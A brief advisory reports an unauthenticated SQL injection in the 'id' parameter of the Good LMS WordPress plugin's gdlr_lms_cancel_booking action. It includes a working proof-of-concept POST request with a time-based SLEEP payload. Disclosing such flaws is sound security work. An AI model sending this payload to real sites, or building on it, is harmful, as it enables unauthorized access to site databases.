The Good LMS WordPress plugin was vulnerable to Unauthenticated SQL Injection in its ‘id’ parameter of the gdlr_lms_cancel_booking action.
POST /wp-admin/admin-ajax.php HTTP/1.1 action=gdlr_lms_cancel_booking&id;=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)